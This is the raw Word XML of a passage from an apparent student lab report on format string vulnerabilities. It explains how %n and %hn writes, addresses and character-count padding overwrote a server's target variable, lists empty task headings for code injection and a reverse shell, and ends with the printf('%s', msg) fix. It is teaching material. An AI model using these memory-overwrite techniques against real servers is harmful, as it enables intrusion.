                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2292793"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF9B90C" w14:textId="703D0920" w:rsidR="0092418D" w:rsidRDefault="0092418D"/>
    <w:p w14:paraId="709415EB" w14:textId="1DD3A9DD" w:rsidR="0092418D" w:rsidRDefault="00380109">
      <w:r w:rsidRPr="00E605F1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Observation</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="008C4020">
        <w:t xml:space="preserve"> Created a format specifier input with binary address of target variable</w:t>
      </w:r>
      <w:r w:rsidR="00E605F1">
        <w:t xml:space="preserve"> and then format specifiers </w:t>
      </w:r>
      <w:r w:rsidR="0093018D">
        <w:t xml:space="preserve">23 %x </w:t>
      </w:r>
      <w:r w:rsidR="00E605F1">
        <w:t xml:space="preserve">as in above task (#4) and used %n to manipulate the value. When gave the input to the buffer of server program, the target variable value was changed from </w:t>
      </w:r>
      <w:r w:rsidR="00E605F1" w:rsidRPr="00E605F1">
        <w:t>﻿0x11223344</w:t>
      </w:r>
      <w:r w:rsidR="00E605F1">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00E605F1" w:rsidRPr="00E605F1">
        <w:t>﻿0x00000099</w:t>
      </w:r>
      <w:r w:rsidR="00E605F1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727C95B8" w14:textId="3088B1B9" w:rsidR="00380109" w:rsidRDefault="00380109"/>
    <w:p w14:paraId="0716E60B" w14:textId="4CDA0004" w:rsidR="00380109" w:rsidRDefault="00380109">
      <w:r w:rsidRPr="0093018D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explanation</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00E605F1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0093018D">
        <w:t xml:space="preserve">The new modified value is </w:t>
      </w:r>
      <w:r w:rsidR="0093018D" w:rsidRPr="0093018D">
        <w:t>﻿0x00000099</w:t>
      </w:r>
      <w:r w:rsidR="0093018D">
        <w:t xml:space="preserve"> which is equivalent to 153. Because 153 characters has been printed before %n. So when </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0093018D">
        <w:t>printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0093018D">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0093018D">
        <w:t>) see the %n, it modified with that value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A715F4" w14:textId="623F6B93" w:rsidR="00380109" w:rsidRDefault="00380109"/>
    <w:p w14:paraId="360EC33D" w14:textId="6F64D705" w:rsidR="0093018D" w:rsidRDefault="0093018D"/>
    <w:p w14:paraId="0A99CF2F" w14:textId="49ADF4FF" w:rsidR="0093018D" w:rsidRDefault="0093018D"/>
    <w:p w14:paraId="319CB9F2" w14:textId="6496548D" w:rsidR="0093018D" w:rsidRDefault="0093018D"/>
    <w:p w14:paraId="763684AE" w14:textId="248CF0C9" w:rsidR="0093018D" w:rsidRDefault="0093018D"/>
    <w:p w14:paraId="4DFE264F" w14:textId="2A1095FE" w:rsidR="0093018D" w:rsidRDefault="0093018D"/>
    <w:p w14:paraId="5956FD53" w14:textId="79414100" w:rsidR="0093018D" w:rsidRDefault="0093018D"/>
    <w:p w14:paraId="576793C3" w14:textId="3B9C75EF" w:rsidR="0093018D" w:rsidRDefault="0093018D"/>
    <w:p w14:paraId="7C652059" w14:textId="4E96DDF5" w:rsidR="0093018D" w:rsidRDefault="0093018D"/>
    <w:p w14:paraId="0CCDE1F0" w14:textId="5161772C" w:rsidR="0093018D" w:rsidRDefault="0093018D"/>
    <w:p w14:paraId="2325BBA9" w14:textId="799D12B7" w:rsidR="0093018D" w:rsidRDefault="0093018D"/>
    <w:p w14:paraId="19E3EBE5" w14:textId="4BFA65CB" w:rsidR="0093018D" w:rsidRDefault="0093018D"/>
    <w:p w14:paraId="602008B7" w14:textId="77777777" w:rsidR="001C391D" w:rsidRDefault="001C391D"/>
    <w:p w14:paraId="59E447A3" w14:textId="77777777" w:rsidR="0093018D" w:rsidRDefault="0093018D"/>
    <w:p w14:paraId="3B9C2993" w14:textId="5E7249A4" w:rsidR="00380109" w:rsidRDefault="00380109">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Task 5.B: Change the value to 0x500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F077635" w14:textId="77777777" w:rsidR="00380109" w:rsidRDefault="00380109"/>
    <w:p w14:paraId="076547D7" w14:textId="483DBA67" w:rsidR="0092418D" w:rsidRDefault="0093018D">
      <w:r w:rsidRPr="0093018D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0947843D" wp14:editId="55B62888">
            <wp:extent cx="5943600" cy="2139950"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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39950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0324E8D3" w14:textId="558BDF98" w:rsidR="0093018D" w:rsidRDefault="0093018D"/>
    <w:p w14:paraId="720D9BAA" w14:textId="3E6A6E67" w:rsidR="0093018D" w:rsidRDefault="0093018D">
      <w:r w:rsidRPr="00726AF5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Observation</w:t>
      </w:r>
      <w:r>
        <w:t>: Created a format specifier input with binary address of target variable and then format specifiers</w:t>
      </w:r>
      <w:r w:rsidR="00726AF5">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> When gave the input to the buffer of server program, the target variable value was changed from </w:t>
      </w:r>
      <w:r w:rsidRPr="00E605F1">
        <w:t>﻿0x11223344</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="00E605F1">
        <w:t>﻿0x00000</w:t>
      </w:r>
      <w:r w:rsidR="00726AF5">
        <w:t>500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5B2755" w14:textId="36009C2E" w:rsidR="0093018D" w:rsidRDefault="0093018D"/>
    <w:p w14:paraId="5074624F" w14:textId="2A4E993E" w:rsidR="0093018D" w:rsidRDefault="0093018D" w:rsidP="00726AF5">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00726AF5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explanation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00726AF5">
        <w:t xml:space="preserve">By end of %x format specifiers, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00726AF5" w:rsidRPr="00726AF5">
        <w:t>printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00726AF5" w:rsidRPr="00726AF5">
        <w:t xml:space="preserve"> () has already printed 203</w:t>
      </w:r>
      <w:r w:rsidR="00726AF5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00726AF5" w:rsidRPr="00726AF5">
        <w:t>characters</w:t>
      </w:r>
      <w:r w:rsidR="00726AF5">
        <w:t xml:space="preserve"> and then </w:t>
      </w:r>
      <w:r w:rsidR="00726AF5" w:rsidRPr="00726AF5">
        <w:t>adding 1077</w:t>
      </w:r>
      <w:r w:rsidR="00726AF5">
        <w:t xml:space="preserve"> which is 1280,</w:t>
      </w:r>
      <w:r w:rsidR="00726AF5" w:rsidRPr="00726AF5">
        <w:t xml:space="preserve"> which is 0x00000500 in hexadecimal</w:t>
      </w:r>
      <w:r w:rsidR="00726AF5">
        <w:t xml:space="preserve"> and the %n updated that target variable</w:t>
      </w:r>
      <w:r w:rsidR="00F45D80">
        <w:t xml:space="preserve"> with the number of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F45D80">
        <w:t>character</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F45D80">
        <w:t xml:space="preserve"> printed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CA26D5" w14:textId="4A40905F" w:rsidR="0092418D" w:rsidRDefault="0092418D"/>
    <w:p w14:paraId="29EF61EF" w14:textId="5F8CC3FF" w:rsidR="0092418D" w:rsidRDefault="0092418D"/>
    <w:p w14:paraId="3647F3FD" w14:textId="01680F66" w:rsidR="0092418D" w:rsidRDefault="0092418D"/>
    <w:p w14:paraId="10237168" w14:textId="03109397" w:rsidR="0092418D" w:rsidRDefault="00E04C81">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Task 5.C: Change the value to 0xFF990000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFABC3B" w14:textId="0713FC01" w:rsidR="00E04C81" w:rsidRDefault="00E04C81">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24B7714E" w14:textId="70F9670A" w:rsidR="00E04C81" w:rsidRDefault="00F8114D">
      <w:r w:rsidRPr="00F8114D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AF2E092" wp14:editId="3D678043">
            <wp:extent cx="5943600" cy="2153285"/>
            <wp:effectExtent l="0" t="0" r="0" b="571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53285"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E56E96C" w14:textId="7745BA6F" w:rsidR="0092418D" w:rsidRDefault="0092418D"/>
    <w:p w14:paraId="490E2B3C" w14:textId="59137ACB" w:rsidR="0092418D" w:rsidRDefault="00726AF5">
      <w:r w:rsidRPr="001A01C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Observation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="001A01C3">
        <w:t xml:space="preserve">Created a format specifier input with binary address of target variable and then format specifiers. When gave the input to the buffer of server program, the target variable value was changed from </w:t>
      </w:r>
      <w:r w:rsidR="001A01C3" w:rsidRPr="00E605F1">
        <w:t>﻿0x11223344</w:t>
      </w:r>
      <w:r w:rsidR="001A01C3">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="001A01C3" w:rsidRPr="00E605F1">
        <w:t>﻿0x</w:t>
      </w:r>
      <w:r w:rsidR="00CC197D">
        <w:t>ff990000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B742B88" w14:textId="62B6E4E2" w:rsidR="00726AF5" w:rsidRDefault="00726AF5"/>
    <w:p w14:paraId="6E2394F7" w14:textId="1937E9F5" w:rsidR="008415BB" w:rsidRPr="008415BB" w:rsidRDefault="00726AF5" w:rsidP="008415BB">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="ƒ1œ˛" w:hAnsi="ƒ1œ˛" w:cs="ƒ1œ˛"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A01C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Explanation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="001A01C3">
        <w:t xml:space="preserve"> By using the length modifier %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001A01C3">
        <w:t>hn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CC197D">
        <w:t xml:space="preserve">, modified the target value by two bytes at a time, by breaking the target variable into two (2 bytes each). The lower two bytes </w:t>
      </w:r>
      <w:r w:rsidR="0007352C">
        <w:t xml:space="preserve">were stored at address </w:t>
      </w:r>
      <w:r w:rsidR="0007352C">
        <w:rPr>
          <w:rFonts w:ascii="ƒ1œ˛" w:hAnsi="ƒ1œ˛" w:cs="ƒ1œ˛"/>
        </w:rPr>
        <w:t xml:space="preserve">0x0804a040 and changed to 0000, </w:t>
      </w:r>
      <w:r w:rsidR="008415BB">
        <w:rPr>
          <w:rFonts w:ascii="ƒ1œ˛" w:hAnsi="ƒ1œ˛" w:cs="ƒ1œ˛"/>
        </w:rPr>
        <w:t>whereas</w:t>
      </w:r>
      <w:r w:rsidR="0007352C">
        <w:rPr>
          <w:rFonts w:ascii="ƒ1œ˛" w:hAnsi="ƒ1œ˛" w:cs="ƒ1œ˛"/>
        </w:rPr>
        <w:t xml:space="preserve"> higher two bytes are at 0x0804a042 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0007352C">
        <w:rPr>
          <w:rFonts w:ascii="ƒ1œ˛" w:hAnsi="ƒ1œ˛" w:cs="ƒ1œ˛"/>
        </w:rPr>
        <w:t>abd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0007352C">
        <w:rPr>
          <w:rFonts w:ascii="ƒ1œ˛" w:hAnsi="ƒ1œ˛" w:cs="ƒ1œ˛"/>
        </w:rPr>
        <w:t xml:space="preserve"> changed to 0xFF99 (equivalent decimal value: 65433)</w:t>
      </w:r>
      <w:r w:rsidR="008415BB">
        <w:rPr>
          <w:rFonts w:ascii="ƒ1œ˛" w:hAnsi="ƒ1œ˛" w:cs="ƒ1œ˛"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the total number of characters printed before the format string reaches the first %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008415BB">
        <w:rPr>
          <w:rFonts w:ascii="ƒ1œ˛" w:hAnsi="ƒ1œ˛" w:cs="ƒ1œ˛"/>
        </w:rPr>
        <w:t>hn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008415BB">
        <w:rPr>
          <w:rFonts w:ascii="ƒ1œ˛" w:hAnsi="ƒ1œ˛" w:cs="ƒ1œ˛"/>
        </w:rPr>
        <w:t xml:space="preserve"> is 12+(22*8) +23, so we need 65433-(12+(22*8) +23= 65433 -211 = 65222 to be added to the first %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008415BB">
        <w:rPr>
          <w:rFonts w:ascii="ƒ1œ˛" w:hAnsi="ƒ1œ˛" w:cs="ƒ1œ˛"/>
        </w:rPr>
        <w:t>hn.</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1BFDC1E6" w14:textId="6616B965" w:rsidR="001A01C3" w:rsidRDefault="0007352C" w:rsidP="001A01C3">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ƒ1œ˛" w:hAnsi="ƒ1œ˛" w:cs="ƒ1œ˛"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18640B4D" w14:textId="7DB76A4A" w:rsidR="0092418D" w:rsidRDefault="0092418D"/>
    <w:p w14:paraId="0075992A" w14:textId="22AD536D" w:rsidR="00E159E9" w:rsidRDefault="003534A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Task 6: Inject Malicious Code into the Server Program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E664DBE" w14:textId="65C1675C" w:rsidR="00FC5E3A" w:rsidRDefault="00FC5E3A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47A71FA5" w14:textId="77777777" w:rsidR="00FC5E3A" w:rsidRDefault="00FC5E3A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0862ACC7" w14:textId="4C8B05E4" w:rsidR="003534A6" w:rsidRDefault="003534A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C6DCD21" w14:textId="7175D401" w:rsidR="003534A6" w:rsidRDefault="003A5DEA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Task 7: Getting a Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50532D1D" w14:textId="21F68A07" w:rsidR="00FC5E3A" w:rsidRDefault="00FC5E3A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A19F5E1" w14:textId="77777777" w:rsidR="00FC5E3A" w:rsidRDefault="00FC5E3A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="57E15AEC" w14:textId="7B69E320" w:rsidR="003A5DEA" w:rsidRDefault="003A5DEA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="283B4933" w14:textId="089DCAFB" w:rsidR="003A5DEA" w:rsidRDefault="003A5DEA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Task 8: Fixing the Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2880AC24" w14:textId="6B58BA51" w:rsidR="003A5DEA" w:rsidRDefault="003A5DEA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45F09C14" w14:textId="23D6CCEF" w:rsidR="003A5DEA" w:rsidRDefault="009B173C">
      <w:r w:rsidRPr="009B173C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6059740B" wp14:editId="30395DF8">
            <wp:extent cx="5943600" cy="21532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53285"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0280BE80" w14:textId="25DB2B19" w:rsidR="009B173C" w:rsidRDefault="009B173C">
      <w:r w:rsidRPr="009B173C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64111E98" wp14:editId="13096F86">
            <wp:extent cx="5943600" cy="2153285"/>
            <wp:effectExtent l="0" t="0" r="0" b="571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3285"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D3805C" w14:textId="6C081E00" w:rsidR="0092418D" w:rsidRDefault="0092418D"/>
    <w:p w14:paraId="0E73DA4B" w14:textId="5046AFC4" w:rsidR="009B173C" w:rsidRDefault="009B173C">
      <w:r w:rsidRPr="00386C02">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Observation</w:t>
      </w:r>
      <w:r>
        <w:t>: Fixed the warning message</w:t>
      </w:r>
      <w:r w:rsidR="003048A9">
        <w:t xml:space="preserve"> by modifying the program </w:t>
      </w:r>
      <w:r w:rsidR="003048A9" w:rsidRPr="003048A9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>﻿</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003048A9" w:rsidRPr="003048A9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003048A9" w:rsidRPr="003048A9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003048A9" w:rsidRPr="003048A9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003048A9" w:rsidRPr="003048A9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>s",</w:t>
      </w:r>
      <w:r w:rsidR="003048A9" w:rsidRPr="003048A9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>msg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003048A9" w:rsidRPr="003048A9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>);,</w:t>
      </w:r>
      <w:r w:rsidR="003048A9">
        <w:t xml:space="preserve"> to avoid the format string vulnerability. When compiled the program to server2, this time the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003048A9">
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003048A9">
        <w:t xml:space="preserve"> didn’t </w:t>
      </w:r>
      <w:r w:rsidR="003048A9">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">have any security warning. Also, when tried to attack, to print the format string, the server printed the given message as is. </w:t>
      </w:r>
      <w:r w:rsidR="00386C02">
        <w:t>So,</w:t>
      </w:r>
      <w:r w:rsidR="003048A9">
        <w:t xml:space="preserve"> attack failed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167975A4" w14:textId="4CA2CA60" w:rsidR="009B173C" w:rsidRDefault="009B173C"/>
    <w:p w14:paraId="1C3AAEC0" w14:textId="66BFD481" w:rsidR="009B173C" w:rsidRDefault="009B173C">
      <w:r w:rsidRPr="00386C02">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explanation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="003048A9">
        <w:t xml:space="preserve">The bug here is not using the format specifier in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003048A9">
        <w:t>printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003048A9">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003048A9">
        <w:t>) statement, as not we are considering the input msg as string and printing as string, it will just print the msg content as is. By this, format string vulnerability has been addressed and the attacks are failed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6160092E" w14:textId="3C4D232C" w:rsidR="0092418D" w:rsidRDefault="0092418D"/>
    <w:p w14:paraId="764B1351" w14:textId="3930FD71" w:rsidR="0092418D" w:rsidRDefault="0092418D"/>
    <w:p w14:paraId="2777AB00" w14:textId="50A61F40" w:rsidR="0092418D" w:rsidRDefault="0092418D"/>
    <w:p w14:paraId="1009B7B0" w14:textId="5FD8A1D1" w:rsidR="00380109" w:rsidRDefault="00380109"/>
    <w:p w14:paraId="14C4C8B0" w14:textId="5C53C1C8" w:rsidR="00380109" w:rsidRDefault="00380109"/>
    <w:p w14:paraId="143DF831" w14:textId="28671DCF" w:rsidR="00380109" w:rsidRDefault="00380109"/>
    <w:p w14:paraId="16EF55E9" w14:textId="76BF7899" w:rsidR="00380109" w:rsidRDefault="00380109"/>
    <w:p w14:paraId="2A828530" w14:textId="6C3C42CC" w:rsidR="00380109" w:rsidRDefault="00380109"/>
    <w:p w14:paraId="5EDB8D6F" w14:textId="27CDC8F2" w:rsidR="00380109" w:rsidRDefault="00380109"/>
    <w:p w14:paraId="1CA2BBCA" w14:textId="2A0AFFFD" w:rsidR="00380109" w:rsidRDefault="00380109"/>
    <w:p w14:paraId="030B4AF4" w14:textId="42D1DF26" w:rsidR="00380109" w:rsidRDefault="00380109"/>
    <w:p w14:paraId="086A92B2" w14:textId="7B8A5AA0" w:rsidR="00386C02" w:rsidRDefault="00386C02"/>
    <w:p w14:paraId="05C3B386" w14:textId="3FCAD7D9" w:rsidR="00386C02" w:rsidRDefault="00386C02"/>
    <w:p w14:paraId="63C77433" w14:textId="75C1B698" w:rsidR="00386C02" w:rsidRDefault="00386C02"/>
    <w:p w14:paraId="2386DEE8" w14:textId="08221D29" w:rsidR="00386C02" w:rsidRDefault="00386C02"/>
    <w:p w14:paraId="1FC56E2F" w14:textId="7420D511" w:rsidR="00386C02" w:rsidRDefault="00386C02"/>
    <w:p w14:paraId="2A9ADEC5" w14:textId="1260ED22" w:rsidR="00386C02" w:rsidRDefault="00386C02"/>
    <w:p w14:paraId="2B75E25B" w14:textId="64798EF4" w:rsidR="00386C02" w:rsidRDefault="00386C02"/>
    <w:p w14:paraId="266E14F0" w14:textId="6825FD0C" w:rsidR="00386C02" w:rsidRDefault="00386C02"/>
    <w:p w14:paraId="1469A89A" w14:textId="3475DD5C" w:rsidR="00386C02" w:rsidRDefault="00386C02"/>
    <w:p w14:paraId="28B9DBDA" w14:textId="7D341455" w:rsidR="00386C02" w:rsidRDefault="00386C02"/>
    <w:p w14:paraId="51FCEE6C" w14:textId="6F5394A6" w:rsidR="00386C02" w:rsidRDefault="00386C02"/>
